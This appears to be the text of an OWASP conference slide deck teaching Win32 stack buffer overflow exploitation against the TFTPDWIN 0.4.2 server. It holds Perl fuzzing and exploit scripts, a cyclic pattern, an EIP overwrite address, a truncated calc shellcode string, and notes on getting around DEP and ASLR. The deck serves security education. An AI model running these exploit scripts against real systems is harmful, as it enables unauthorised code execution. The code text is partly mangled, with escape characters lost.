I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection.

1. Sending A for Ahuh.
Win32 Exploit development old school

2. The OWASP Foundation
http://www.owasp.org
Nahidul Kibria
Co-Leader, OWASP Bangladesh,
Principal Software Engineer,
Orbitax Bangladesh Ltd.
Writing code for fun and food. And a
security enthusiastic
@nahidupa

3. Sending A for Ahuh.
Win32 Exploit development old school
WTHell this
guy talking
about?

4. The OWASP Foundation
http://www.owasp.org
Attacker Dream

5. Get a remote shell

6. 6
Demo

7. 7
This is what we will talk about!

8. The OWASP Foundation
http://www.owasp.org
How did it happened?

9. The OWASP Foundation
http://www.owasp.org
69

10. 10
Disclaimer

11. How do a program write?
Code
Compiler
executable

12. 12

13. We write code in many language

14. CPU only know Assembly

15. X86 Registers
• EIP - Address of next instruction
• ESP - Address for the top of the stack
• EBP - Stack Base Address
• EAX/ECX/EDX - Holds variables and data
for the application

16. 16

17. 17

18. 18
Lets open a exe in debugger

19. 19
Code
CPU
register
mapping
Stack

20. What is the Stack
• Holds the functions and function
variables
• User Input
• Data needed by the app
• LIFO "last in, first out"

21. Memory Address
point in EIP
Code
CPU
register
mapping
Stack
Stack pointer

22. 22
Lets Make a application cry

23. 23

24. 24
Fuzzing
We will send A “x41”

25. 25
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0]
$ARGV[1]";
my $buf="x41"x200;
print $victim $buf;
print " + Malicious request sent ...n";
sleep(2);
print "Done.n";
close($victim);
$host = $ARGV[0];
exit;c

26. 26
Demo

27. 27
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0]
$ARGV[1]";
my $buf="x41"x300;
print $victim $buf;
print " + Malicious request sent ...n";
sleep(2);
print "Done.n";
close($victim);
$host = $ARGV[0];
exit;c

28. 28
Demo

29. 29
First blood
But we don’t know what happened

30. 30
Run the application with debugger

31. 31
Demo

32. 32

33. 33
Ahu
EIP - Address of next
instruction

34. 34
Question is why ?

35. Think about this in a process context

36. 36
The program stack in foo() with various inputs
A. - Before data is copied

37. 3737
The program stack in foo() with various inputs
B. - "hello" is the first command line argument.

38. 3838
The program stack in foo() with various inputs
C. -
"A​AAAAAAAAAAAAAAAAAA
Ax08​x35​xC0​x80" is the first
command line argument.

39. This is an overflow
Too much data in a space not designed for it

40. Lets back to sending A
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
Ab
40
We send 300 A but don’t know which
A’s are in EIP

41. 41
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0]
$ARGV[1]";
my
buf="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7A
g8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj
1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9";
print $victim $buf;
print " + Malicious request sent ...n“;

42. 42
Demo

43. 43

44. 44
41366941
If you do not notice
yet we also has
control over esp
• ESP - Address for the top of the stack

45. 45
mona.py

46. 46

47. 47
pattern_create / pc | Create a cyclic pattern of a given size
258

48. 48
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0]
$ARGV[1]";
my $buf="x41"x258;
$exploit = $buf. "BBBBccccc" ;
print $victim $exploit;
print " + Malicious request sent ...n“;

49. 49

50. 50

51. Find jmp to esp
We can control the EIP and ESP
Little Endian: Little and big endian refers
to those bytes that are the most
significant. In a little-endian system, the
least significant byte is stored first. x86
uses a little-endian architecture.

52. 52

53. 53

54. Next step is how much space we
have for holding our data
ESP about 250 byte

55. 55
my $nop0="x41"x256;
my $buf="x00x01".$nop0;
$eip = "x0AxAFxD8x77";
$calcshell="xfdx2fx49x91xa8x47xbex27x05x43xd4x7cx03xf5x
b5xb8x1cx2dx14xb2xb0x66xf9xbex3dxd7xbexa7x29xc9xdbxdc
xd9x74x24xf4xb1x33x5bx31x73x10x03x73x10x83xfexd3x5cx
52xfcx34x29x9d...";
$exploit = $buf. $eip .$calcshell."x00";
print $victim $exploit;
print " + Malicious request sent ...n“;
Shell Code

56. 56
Demo

57. Final Skeleton Exploit
$Junk $eip $calcShell
w00t
258

58. Step by step exploit
• Step 1 – Crashing the application:
• Step 2 – Determine the offsets:
• Step 3 – The pain begins, finding an
instruction that will take us back to the
stack:
• Step 4 – Writing venetian shellcode.
• Step 5-Putting it all together

59. 59
Mona.py

60. 60
Demo

61. 61
Egg hunter
ESP about 250 byte

62. What is Structured Exception Handling

64. How to SEH base exploit(in this case we are not overwrite eip)

66. Windows memory protection

68. Data Execution Prevention (DEP)
DEP was introduced in Windows XP Service Pack 2.
Basic idea is
Prevent an application or service from executing code from a
non-executable memory(-NX) region.

69. DEP is two types
hardware-enforced DEP for CPUs that can mark memory
pages as nonexecutable,
and software-enforced DEP with a limited prevention for
CPUs that do not have hardware support.

70. DEP can be bypass by “Return to libc”
Reference: http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf
We still overwrite the return address with one of a
function in libc, pass it the correct arguments and have that execute for us.
Since these functions do not reside on the stack, we can bypass the stack
protection and execute code.

71. ASLR(Address Space Layout Randomization )

72. ASLR can be bypass
“Heap spraying”
JIT spraying most recent check http://dsecrg.com/files/pub/pdf/Confidence2010%20ROP%20and%20JIT-Spray.pdf

73. Return oriented programming
73

74. 74
To Be Continued
@nahidupa